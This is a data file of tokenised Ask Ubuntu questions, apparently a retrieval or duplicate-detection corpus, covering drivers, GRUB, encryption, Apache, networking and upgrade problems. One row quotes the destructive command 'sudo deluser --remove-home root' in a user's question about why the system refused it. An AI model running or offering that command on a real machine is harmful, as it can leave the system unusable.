387454	ubuntu iso file to burn in dvd or usb	how to locate ubuntu iso file to burn it in dvd or usb in download file at http : //www.ubuntu.com/download/desktop/questions ? distro=desktop & bits=32 & release=lts or should i download it from elsewhere
387455	mg $ ! % ) printer not working	i have just started with ubuntu and am a real noob . all is fine except i ca n't get the canon mg4150 printer to work . everything gets sent to the file and it says all is printed but nothing is happening at the printer . my old xp desktop has no problems printing on the same printer . any help before i try another os .
387456	puzzle game qml gridview animation problems	i 've been working on a puzzle game for ubuntu touch and i 'm facing some issues with animations . the problem seems to occurs when gridview animations ( add , move , remove ... ) play too fast . something like that it is explained here : http : //qt-project.org/doc/qt-5.0/qtquick/qml-qtquick2-viewtransition.html # handling-interrupted-animations i 've been trying to solve that issue , but without success ... i 'd love any help on that . is there any qml ninja could help me ? links : there is an early presentation of this game here : https : //www.youtube.com/watch ? v=j1-v52dwwyk the source code is on github : github.com/jdorleans/matching-tuxďťż
387457	no new release found for ubuntu 13.04	i tried to upgrade ubuntu with do-release-upgrade command . it started downloading for hours and some errors occured at the end . i tried again another day , it started downloading more files but no success . now it 's not updating anymore and prompts this message : no new release found but my ubuntu version is 13.04 : release : 13.04 i installed kde and gnome shell on ubuntu and now i 'm using kde
387460	does ubuntu allow users to run eset smart security ?	does ubuntu allow users to run eset smart security ? i am considering upgrading ubuntu from windows 7 but i 'm not sure if it allows the use of outside security programs .
387463	how to decrypt encryptfs at boot	/root/.crypt /root/crypt ecryptfs ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=d395309aaad4de06 , ecryptfs_fnek_sig=d395309aaad4de06 0 0 i have the above entry in fstab . it is specifying that the /root/crypt disk is not available ( notice not /root/.crypt ) . however , it does not offer the option to wait or resolve manually . it simply continues on with the boot . in addition there is no mention of this occurring in /var/log/boot.log . the permissions of both .crypt and crypt are root : root:775 my intention is to decrypt ecryptfs at boot ( not dm_crypt ) , not pam login as provided by the ecryptfs private utils . i am aware of the functionality provided by dm_crypt/ecryptfs at user login . /root/crypt is on a mount that is specified before in /etc/fstab and is successfully mounted at the conclusion of boot .
387470	ubuntu 13.04 eating up a lot of memory on startup	i have 3 gb memory , and ubuntu 13.04 installed on my laptop . when i startup up my laptop , with just the system monitor running , more than 63 % of the memory has already been occupied . what is going on and how can i fix it ( without changing my os ) ?
387472	13.10 's text entry settings are missing some input methods in gnome flashback	i added the input method `` chinese ( pinyin ) '' in `` text entry settings '' while using unity . however , when i now login with `` gnome flashback '' or `` gnome with xmonad '' , `` chinese ( pinyin ) '' does no longer show up in the list of `` input sources to use '' . also , it is not available in the list `` select an input source to add '' . when i log back into unity , `` chinese ( pinyin ) '' appears again as if it had never been gone . why is that ? ( i can still switch between `` english ( us ) '' and `` chinese ( pinyin ) '' when not logged into unity . however , the little overlay that shows the input candidates is missing when not using unity , making pinyin input useless . this issue may or may not be related . )
387474	wrong resolution on an attached projector to desktop pc ( with nvidia gpu , set as `` twinview '' )	i have an nvidia quadro fx 1800 gpu on a ubuntu 13.04 , with driver v.319 . the primary monitor ( res . 1280x1024 ) is connected to the display port of the card ( 1 or the 2 ) . the gpu has a dvi output , which i have connected to a projector . the projector supports res . 1920 x 1080 , and we have tested that with another laptop . now , when i choose twinview in nvidia-settings and set the projector monitor to the right of my primary monitor , this more or less is what i get , but not exactly . on the projector i verify that the received signal 's resolution is 1920x1080 , however , when i maximize a window on the projector monitor , a vertical strip on the left of the projector viewport is not shown ( and so , part of the app window that i have maximised is not visible ) . to give a bit more perpective , i swipe the mouse from my primary monitor to the right , towards the projector and the mouse pointer does not appear on the projector view , as soon as it disappears from the primary view ... . what could be wrong ? how could i go about fixing this ? thank you for your help .
387476	keyboard issues	would it be possible to identify whether my keyboard issues are hardware or software related ? after upgrading my hdd to ssd , some keys stopped working ; such as enter , z , left arrow keys and all fn key combination . i am using ubuntu 13.10 on an asus vivobook x202e . i could n't find useful hints in the internet . any help would be welcome , i am really stuck . thanks guys
387477	matlab installation from .iso problem	i tried installing matlab on ubuntu 12.04 from an .iso , unsuccessfully . the .iso file is mounted , but when i go to the mounted folder and type ./install , i get this error message : error : can not locate java runtime environment ( jre ) . the directory /mnt/iso/sys/java/jre/glnx86/jre does not exist . that seems pretty normal , since the directory glnx86 does n't exist , but instead , in the install script , it seems like this should be exchanged with glnxa64 , which does exist . i tried to modify the script in the install file and deleted the glnx86 values , retried to run the script , but then i get another error message : preparing installation files ... installing ... /tmp/mathworks_11559/sys/java/jre/glnxa64/jre/bin/java : 1 : /tmp/mathworks_11559/sys/java/jre/glnxa64/jre/bin/java : syntax error : `` ( `` unexpected finished can someone help me out of this , please ?
387478	executable files on my computer can not be executed and can not be run by terminal	i 'm really new to ubuntu and linux , so everything has flown straight over my head , but this problem is obviously not normal . i 've looked all over the place for a solution to this problem , but all the answers to related issues have not helped . this is just the most recent example , but it applies to all executable programs . programs do not run , and i receive this message when i do not allow to execute file as program : could not display “starbound” . there is no application installed for “executable” files . do you want to search for an application to open this file ? when i go to the program 's properties and check the box allowing it to run as a program , it simply does nothing . when i try to run the program through the terminal , it will not allow me . it even shows `` starbound '' in the ls display . this is the full terminal entry : root @ john-system-product-name : /home/john/extracted_games/starbound/linux64 # ls asset_packer launch_starbound_server.sh libglew.so.1.7 starbound.ico bootstrap.config launch_starbound.sh starbound starbound_server root @ john-system-product-name : /home/john/extracted_games/starbound/linux64 # ./starbound bash : ./starbound : permission denied if anyone has a fix or possible explanation for this please respond .
387482	ubuntu 12.04 wo n't boot after nvidia update	i wanted my asus laptop to use the nvidia gpu instead of the cpu graphics and updated some nvidia drivers . when i rebooted ubuntu starts to load but i only end up with a login to cli and no gui . how do i fix this ? ?
387484	why is there no option to download ubuntu using torrent ?	why i cant choose torrent as a download option ?
387485	how can i debug a possible graphics error that shuts down the graphics card ?	sometimes under fairly specific conditions ( one game particularly ) the nvidia graphic card shuts off and stops sending output to the monitor . i 've tried changes to the driver and that has not fixed it . i 'm 90 % sure it 's a graphics driver problem but how do i track what the cause is if i have to force a power cycle when the error happens ?
387492	sudo deluser -- remove-home root	when i type sudo deluser -- remove-home root it says that 'it may make the whole system unusable so stopping now without performing any action '' and it does n't work . can you explain me why ? thank you
387495	recover data from corrupted windows partition	i know that windows file system is corrupted or missing ... in fact i ca n't boot it and when trying to mount it with : sudo mount /dev/sda3 /temp/ -t ntfs i got ntfs signature is missing . failed to mount '/dev/sda1 ' : invalid argument the device '/dev/sda1 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? i need to recover some pictures and some documents from there ... is there anything i can try ?
387497	how to add the wildcard to any user or database using phpmyadmin ?	how can i add wildcard to any database and it 's user using phpmyadmin so it will accept both connections from local and wan ?
387498	pidgin window getting smaller after restoring from tray ( ubuntu 13.10 )	does anyone have this problem ? i usually use easystroke for managing ubuntu distro 's , but this bug is there whether i use or not easystroke . when i close the buddy list and then reopen it by indicator or by easytroke ( command : pidgin ) the buddy list is getting smaller ( on vertically , usually in the bottom part of the screen ) , if i repeat this operation the windows gets smaller and smaller . i use ubuntu 13.10 64bit version , but did n't have this problem when using ubuntu gnome 13.10 .
387505	weird chromium print feature	i setup a cloud print on chromium . this printer is pretty finicky , but i think they way i did it should stay . the problem is , i ca n't print outside of chromium , obviously . and then i tried to print from it , but it just brought up the normal print dialogue , surely losing hope of using my web printer from it . except , there was a printer i did n't recognize . npia ... something or other . so i just clicked it and forgot about it . a little bit later , it started printing ! i exited out chromium , and i was still able to print to it , despite not having it set up the standard way . what feature is ? how can i get it to work with shared printers ? or is something else going on ? note : another weird thing is that it is n't showing up in my google cloud print print que online . weird !
387509	hp dv6 2020sa // battery ?	i got to understand that hp dv6 series are n't the best choice for ubuntu . the problem is the battery . if i disconnect the cable everything dies instantaneously . what can i do ? i suppose you 'll ask me something like this : $ > upower -i /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0a:00/power_supply/bat0 vendor : hewlett-packard model : primary power supply : yes updated : sat 07 dec 2013 04:52:16 pm cet ( 12 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 0 wh energy-empty : 0 wh energy-full : 47.52 wh energy-full-design : 47.52 wh energy-rate : 0 w percentage : 0 % capacity : 100 % technology : lithium-ion many thanks ( in advance ) !
387510	system running in low graphic mode ... what do i do ?	i recently upgraded to ubuntu 13.04 an when it boots it says checking battery state an signal 15 then it shows system running in low graphic mode what do i do ?
387511	ca n't set xfce4-mailwatch-plugin to watch my claws mh directory	i experience difficulties to configure xfce4-mailwatch-plugin . i use claws as email client - it seems to store mails in mh format , so it 's is indeed possible to connect it with the plugin . but i have no ~/mh_profile file , which is needed by xfce4-mailwatch-plugin to check my mail . i ca n't figure out what to put in this file in order to get the plugin to watch in my ~/mail directory . thanks for any help you could give .
387513	converting into mpeg4 for cinelerra without quality loss	whilst i am mostly editing films in openshot , i am not sure it has quite caught up with cinelerra in terms of features . plus the currently installed version of openshot is still a little buggy and crashes sometimes . however , i am having problems getting my footage into the correct format for cinelerra . i have the correct video codecs installed ( mpeg-4 ) , and i 'm converting footage from various different camera devices into the quicktime container format with mpeg-4 video . however , the cinelerra documentation says it also wants mpeg-4 audio format which i believe is ( als ) when using avconv . i have some m2v files with no audio ( back from when i was using a mac and final cut to make dvds ) , and we would like to re-edit these . so i want to use something like in shell script : for f in *m2v ; do avconv -i `` $ f '' -c : a als -c : v mpeg4 `` $ { f/ % m2v/mov } '' ; done however if i call this the mov file produced has really poor quality ( although both it and the source have 720x576x25 ) , and if i look at its properties in nautilus , it says that its video codec is 'ffodivx ' , and not mpeg-4 . is there anything i can do to convert these videos into format desired without the quality loss ? other files i 've converted ( from .dv and .mts ) convert fine using the same method . so i presume the issue is in decoding the source rather than encoding the result . in nautilus the source file says its video codec is ffmpeg2 , bitrate 7519 kb/s . the result only has 556 kb/s , maybe this is the problem ?
387515	grub not booting correctly after dual boot install	i followed these instructions to dual boot windows 8 and ubuntu : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) i was successfully able to install ubuntu . but then i could n't boot into windows 8 `` file : \boot\bcd status : 0xc000000c info : the boot configuration data for your pc is missing or contains errors . '' so i ran boot-repair in ubuntu . but then when i restarted computer i get : error : invalid arch independent elf magic grub rescue > at the end of boot-repair i had this message : please do not forget to make your bios boot on sda2/efi/ubuntu/shimx64.efi file ! i have no idea how to do that . i am able to boot into ubuntu by hitting the f12 on startup , otherwise it goes to the screen with the invalid arch error . here is the summary of the boot-repair : http : //paste.ubuntu.com/6535680 edit : still not able to boot into windows 8 from grub screen btw i get : error : unknown command 'drivemap ' . error : invalid efi file path . edit : a few more details : when i installed ubuntu i had my bios set to legacy mode ( not uefi ) as suggested by the article above . when i installed ubuntu i chose the `` install ubuntu alongside windows 8 '' option .
387516	ca n't detect realtek rtl8101e/rtl8102e ethernet controller	i need some body give me insight in this issue : i have damn toshiba satlellite c850-a989 with ubuntu 13.10 installed , the wireless card work fine . but the ethernet controller not working . and i dont know if i have problem in my preinstalled ( default ) driver or not . this is a output of : $ lspci :02:00.0 network controller : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter :03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller $ ifconfig -a lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:41 errors:0 dropped:0 overruns:0 frame:0 tx packets:41 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4169 ( 4.1 kb ) tx bytes:4169 ( 4.1 kb ) wlan0 link encap : ethernet hwaddr 24 : ec:99:3f : a9 : ee up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) i downlaoded the rtl8101e/rtl8102e driver from official realtek website from this link : and i start installing the driver from source code , but ending with error make [ 3 ] : *** [ /home/manee/downloads/r8101-1.024.00/src/r8101_n.o ] error 1 make [ 2 ] : *** [ _module_/home/manee/downloads/r8101-1.024.00/src ] error 2 make [ 1 ] : *** [ modules ] error 2 make : *** [ modules ] error 2 i looked into code.google and i found there is a patch must be putted in src folder , i putted the patch but the same error still there .
387518	why ca n't i open protected pdf 's ?	before i did a reformat , i could open university of phoenix 's protected pdf files using adobe in ubuntu . now that i have reformatted , everytime i try to login to a protected pdf , i get an error : warning : javascript window - protectedpdf - error there is a problem with this protectedpdf document . it may be damaged . please contact the publisher for a clean file . now , this file opens perfectly fine in mac osx and windows 7 . i have redownloaded it several times , it is not a damaged file . this problem is strictly with linux . i figured initially that it was a java problem , but i 've reinstalled java and i still have the issue anyone out there that can help ? i 've exhausted all my googling efforts . this really sucks , because i really want linux to be my primary os , but it just has issues doing things that are complete non-issues in mac and windows .
387523	can not log in through gui x-server broken	i recently installed fglrx after using the open source drivers ( without any problems ) when restarting gave me black screen i tried everything then decided to un-install the drivers and reinstall open-source drivers but the problem persisted . i then tried the following but still nothing changed . sudo apt-get remove -- purge xorg-driver-fglrx fglrx* sudo apt-get autoremove sudo apt-get update -f sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg sudo apt-get dist-upgrade sudo apt-get install ubuntu-desktop i did notice that i can log in as guest in the splash screen . i 'm using ubuntu 13.10 and kernel 3.12 on a laptop with switchable graphics . i 'm only using unity . inisde tty console i get the following . glxinfo error : unable to open display however in guest session it displays normal values
387529	how to enable crypttab to run at boot	the cryptdisks service is set to run levels 0 and 6 . however , i do n't know if this is a correct setting because perhaps crypttab is made to run in some other fashion . in either case , this is a default 12.04.3 install . this is the crypttab entry : cryptswap1 /dev/sda8 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 and fstab entry : /dev/mapper/cryptswap1 none swap sw 0 0 but at boot it is specifying that the /dev/mapper/cryptswap1 disk is not available and to either wait , resolve manually or skip .
387530	need help , incidentally switched out of root user !	when i first got this laptop , i had no knowledge what so ever about computers in general . i was messing around with the settings when i saw that my account was identified as a special user or something like that , so , i switched it to standard user . i figured out i messed up when i try 'd to download something from the ubuntu software center . i 've try 'd to watch youtube videos on how i could solve this but it did n't work . can someone please help , i do n't really care what i have to do .
387531	save enviroment path once i added one	i 'm trying to add an environment path for android studio , and i 've done the following steps : checking is there is already : echo $ path add my path : export path= $ path : /home/ubuntu/programs/android-studio/bin/ check if have been added : echo $ path and it was added correctly . then i close the terminal and reopen . if i do the check now echo $ path there is n't the my path . how should i save the changes in the environment path ?
387533	failed upgrade frm 12 to 3. linux-image not configured etc	i have a netbook that started life with windows 7 and android and then i added ubuntu with grub for the startup/choice menu . since i upgraded from ubuntu 12 to 13.10 etc i 've been having problems . uname -r says it 's `` 3.2.0-53-generic '' . i 've been getting errors when i install apps ( it usually complains but then turns out they 've installed ) or trying to update it ( which errors without updating ) . grub is still 'working ' so i can log into ubuntu and use it but the odd system error does pop up . i also get errors about linux-image not being configured . i 've tried sudo apt-get clean sudo apt-get -f install and when i got errors on the last command i tried sudo apt-get install linux-generic help ! the errors from the last command are : sudo apt-get install linux-generic reading package lists ... done building dependency tree reading state information ... done linux-generic is already the newest version . the following packages will be removed linux-image-extra-3.11.0-12-generic 0 upgraded , 0 newly installed , 1 to remove and 6 not upgraded . 12 not fully installed or removed . after this operation , 105 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 683781 files and directories currently installed . ) removing linux-image-extra-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-12-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) looking in synaptic package manager and filtering on installed & & linux-generic i have : linux-image-generic ( version 3.11.0.14.15 ) linux-image-3.11.0-14-generic linux-image-3.11.0-13-generic linux-image-3.2.0-53-generic linux-image-3.11.0-12-generic linux-image-3.11.6-031106-generic linux-image-extra-3.11.0-14-generic linux-image-extra-3.11.0-12-generic linux-image -- extra-3.11.0-13-generic any help sorting out this tangle would be greatly appreciated . many thanks isabel .
387535	open jdk and chrome	hi i currently have open jdk and i am using chrome on 13.04 ubuntu . i do n't see any java plugin currently installed in about : plugins . i am trying to use a cisco vpn client via the browser . do i need to switch to the oracle java instead of openjdk and install the plugin into chrome afterwards ?
387540	wo n't open ports	i 'm clearly not very good at this stuff . but i have tried the following : sudo iptables -a input -p tcp -- dport 21025 -j accept but it seems to make no difference . netstat -an | grep listen tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen tcp 0 0 0.0.0.0:111 0.0.0.0 : * listen tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 0.0.0.0:10000 0.0.0.0 : * listen tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen tcp 0 0 127.0.0.1:953 0.0.0.0 : * listen tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen tcp 0 0 0.0.0.0:443 0.0.0.0 : * listen tcp 0 0 0.0.0.0:50564 0.0.0.0 : * listen tcp6 0 0 : ::110 : : : * listen tcp6 0 0 : ::143 : : : * listen tcp6 0 0 : ::111 : : : * listen tcp6 0 0 : ::21 : : : * listen tcp6 0 0 : ::53 : : : * listen tcp6 0 0 : ::22 : : : * listen tcp6 0 0 : ::39670 : : : * listen tcp6 0 0 : :1:953 : : : * listen tcp6 0 0 : ::25 : : : * listen i 'd just like to open this port so i can play games on port 21025 : ) running ubuntu 12.04 on a dedicated server and running the commands through the terminal .
387541	home folder , mouse right click and click on folder all fail ( ubuntu 12.04lts )	it just happens recently without any sign . when i click on the home folder , nothing shows up . when i go to the desktop , the right click of the mouse does n't do anything . it seems that the `` folder '' function is completely disabled , because for example , when i click on the `` dropbox '' icon - > `` open dropbox folder '' , nothing is opened . all the files and folders are in the system , and i can open files via pdf viewer . so i guess only the graphical `` folder '' function is problematic . thanks !
387545	error on installing eclipse from software center	i have installed eclipse from the software center and when i open it i get the error that sayt to see a log file . the log file is in ~/.eclipse/org.eclipse.platform_3.7.0_155965261/configuration path and says : ! session 2013-12-07 18:26:43.336 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=i20110613-1736 java.version=1.7.0_45 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86 , ws=gtk , nl=it_it command-line arguments : -os linux -ws gtk -arch x86 ! entry org.eclipse.osgi 4 0 2013-12-07 18:26:44.091 ! message application error ! stack 1 java.lang.unsatisfiedlinkerror : could not load swt library . reasons : no swt-gtk-3740 in java.library.path no swt-gtk in java.library.path ca n't load library : /home/ubuntu/.swt/lib/linux/x86/libswt-gtk-3740.so ca n't load library : /home/ubuntu/.swt/lib/linux/x86/libswt-gtk.so at org.eclipse.swt.internal.library.loadlibrary ( library.java:285 ) at org.eclipse.swt.internal.library.loadlibrary ( library.java:194 ) at org.eclipse.swt.internal.c. < clinit > ( c.java:21 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:63 ) at org.eclipse.swt.internal.converter.wcstombcs ( converter.java:54 ) at org.eclipse.swt.widgets.display. < clinit > ( display.java:132 ) at org.eclipse.ui.internal.workbench.createdisplay ( workbench.java:695 ) at org.eclipse.ui.platformui.createdisplay ( platformui.java:161 ) at org.eclipse.ui.internal.ide.application.ideapplication.createdisplay ( ideapplication.java:153 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:95 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) i have not idea of what could be the problem , how can i solve it ?
387546	error while connecting a2dp device , bluetooth bluez dbus exception ubuntu12.04lts	i 'm unable to connect a a2dp bluetooth speaker in ubuntu 12.04lts . ibm thinkpad r52 . broadcom integrated bluetooth iv . bluez packages installed and up-to-date pulsaudio installed and up-to-date $ dmesg|grep -i bluetooth [ 38.360678 ] bluetooth : core ver 2.16 [ 38.360743 ] bluetooth : hci device and connection manager initialized [ 38.360746 ] bluetooth : hci socket layer initialized [ 38.360748 ] bluetooth : l2cap socket layer initialized [ 38.360754 ] bluetooth : sco socket layer initialized [ 38.367929 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 39.085152 ] thinkpad_acpi : rfkill switch tpacpi_bluetooth_sw : radio is unblocked [ 40.586671 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 40.586674 ] bluetooth : bnep filters : protocol multicast [ 40.606596 ] bluetooth : rfcomm tty layer initialized [ 40.606603 ] bluetooth : rfcomm socket layer initialized [ 40.606606 ] bluetooth : rfcomm ver 1.11 $ hciconfig hci0 : type : br/edr bus : usb bd address : 00:0e:9b : dd:29 : f6 acl mtu : 377:10 sco mtu : 64:8 up running pscan rx bytes:1569 acl:0 sco:0 events:105 errors:0 tx bytes:849 acl:0 sco:0 commands:54 errors:0 errors : $ bluez-test-audio connect 00:0c:8a:96 : d9:19 traceback ( most recent call last ) : file `` /usr/bin/bluez-test-audio '' , line 40 , in audio.connect ( ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in call return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in call **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.bluez.error.failed : connect failed '' $ bluez-simple-agent 00:0c:8a:96 : d9:19 traceback ( most recent call last ) : file `` /usr/bin/bluez-simple-agent '' , line 102 , in path = manager.findadapter ( args [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in call return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in call **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.bluez.error.nosuchadapter : no such adapter update # 1 having tried blueman ( the graphical user interface for bluetooth ) , i was able to shortly pair the a2dp device , but then dmsg | grep -i bluetooth [ 257.824085 ] bluetooth : hci0 link tx timeout [ 257.824100 ] bluetooth : hci0 killing stalled connection 00:0c:8a:96 : d9:19 [ 257.824403 ] bluetooth : hci0 link tx timeout [ 257.824413 ] bluetooth : hci0 killing stalled connection 00:0c:8a:96 : d9:19 so pairing finally failed . consequently , no link even with dbus possible .
387551	does ubntu contain non-free kernel blobs and other non-free system components ?	i heard richard stallman say that ubuntu contains non-free blobs . why does it have such blobs and what functions do these non free blobs and system components do that free software ca n't ? does canoniacal include these to keep control of ubuntu project ? are there any distros that do n't include such non-free firmware blobs by default ?
387558	permissions for /var/www in lubuntu 13.10	so i know this question has been asked 100,000 times but i having spent all afternoon going through answers on here i still have n't been able to find a solution that works for me . so having installed lamp on lubuntu 13.10 i created a new user group that could have permissions to edit /var/www ( called www ) so any user part of that group can create/edit files etc . as needed . this was suggested on here somewhere ( ca n't find the post now ) - obviously i changed the second line to point to my username commands : sudo groupadd www sudo useradd -g username www sudo chown -r : www /var/www sudo chmod -r g+rwx /var/www sudo chmod g+s /var/www however this seems to completely have failed as i still have no permissions to create folders or files in the folder - which i need to to install something like joomla etc . i can see that the group www is now in control of /var/www looking at permissions when i right click and go to properties - the owner is still root though ( not sure if this is an issue or not ) any awesome ideas ?
387563	how can i configure nginx ?	after installing nginx i can see that the homepage of my web server is changed with the default nginx page . how can i configure nginx now ?
387565	xserver boot failed after installing new gpu	i removed pcie graphics card and changed to integrated amd apu graphic card . after reboot woks only text regime . xserver failed to boot . i tried : startx result was : *starting load fallback graphics devices [ fail ] then i tried : /etc/init.d/gdm restart -no result aptitude reinstall lightdm -no result last thing i did was try to install catalyst : ./amd-driver-installer-catalyst-13-4-x86.x86_64.run it wrote something like `` installation denied '' ( without reason ) i dont know how to repair it . thanx for your answers
387566	no networkmanager applet and service	i 've just installed ubuntu 13.10 mini with mate desktop , and i 've also installed network-manager and network-manager-gnome . the problem is that the nm-applet is missing from the tray . even though this may look like a trivial question , i 've tried most of the solutions i 've found but to no avail . the interesting things i 've found out are : even though network-manager and network-manager-gnome are installed , there is no such service known as networkmanager or network-manager . however , after i login and go to a terminal and type sudo networkmanager , the response i get is : networkmanager is already running ( pid 2447 ) ( even though it is not registered as a service / daemon , at starts automatically . even though nm-applet is set to start automatically ( i have it registered in startup applications ) , it does n't appear in the notification area , and this indicates that it can not connect to the network manager service . however , when i start it manually via the terminal , it appears and works flawlessly ( and it shows that the networks are managed by network-manager , not by another service ) . below are some information relevant to my problem : the contents of /etc/network/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback the contents of /etc/networkmanager/networkmanager.conf : [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=true the contents of /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true is there any way i could solve this problem ? thanks in advance .
387570	why does `xvfb-run glxgears` fail with an swrast error ?	xvfb is supposed to let me run x programs in a headless environment . but when i run xvfb-run glxgears , i get : libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . error : could n't get an rgb , double-buffered visual when i run libgl_debug=verbose xvfb-run glxgears , i get : libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl error : failed to load driver : swrast error : could n't get an rgb , double-buffered visual i 'm running stock lubuntu 13.10 x64 with intel ivy bridge integrated graphics . libgl1-mesa-dri is installed and /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so exists . running as root does n't help . what 's going wrong ?
387572	having an issue with using tenda wireless pci adapter w322p setup	i am still a beginner with installing and configuring with linux . i would just like to know what i can do to get the tenda adapter to function and recognize wireless networks . please let me know of any screenshots that are needed and/or more info . i have the disk that has come with the product as well . any help is appreciated . thank you ,
387574	display bssid in terminal without aircrack	i am making a program and i need a command that can display all the bssids and the network names ? i cant use aircrack because i can not cancel the airodump command to carry on . any help will be greatly appreciated
387575	403 apache error with alias to ntfs partition	my machine is currently a dual boot between ubuntu saucy and win 8.1 . i would like to have a common directory for my web development files and so i 'm trying to make an alias for apache pointing to my shared folder on my secondary data disk . i created a /etc/apache2/sites-enabled/linuxshare.conf file containing : alias /lnxsh `` /media/data/linuxshare/lamptest '' < directory `` /media/data/linuxshare/lamptest '' > options indexes followsymlinks multiviews order allow , deny allow from all < /directory > by all i get when accessing http : //localhost/lnxsh is : forbidden you do n't have permission to access /lnxsh/index.html on this server . apache/2.4.6 ( ubuntu ) server at localhost port 80 i looked around the internet and found that most of the time this error was because of permission issues . after many tries i edited my fstab to mount the partitions with rwx partition with my user and group : # auto mount ntfs data partition on /dev/sdb2 /dev/sdb2 /media/data ntfs-3g defaults , auto , umask=0000 , uid=1000 , gid=1000 , nls=utf8 0 0 # auto mount ntfs c : partition on /dev/sdb2 /dev/sda2 /media/computer ntfs-3g defaults , auto , umask=0000 , uid=1000 , gid=1000 , nls=utf8 0 0 and with an ls -l i can easily check that i have the right permissions : user @ computer : /media/data/linuxshare/lamptest $ ll total 1 -rwxrwxrwx 1 user user 12 dăšc . 7 19:15 index.html* what can i possibly be doing wrong ? i 've tried everything including changing apache env variables to change the user from www-data to my own user ... any help would be appreciated , thanks .
387577	formatted partition and now i have grub rescue error	i done goofed . i decided that i really did n't need ubuntu anymore ( and that i wanted to give mint a try ) so instead of doing a smart thing i went ahead and wiped the partition that linux was running off of . now everytime it boots it boots into the grub rescue screen . from other readings i 'm thinking that this is because my windows boot loader was over written by ubuntu . my main problem is that i ca n't fix the boot loader ( tried some command prompts from an article i read ) and i ca n't install win because it has to reboot during instillation and that brings me right back to the error screen ! please help ! ! thanks !
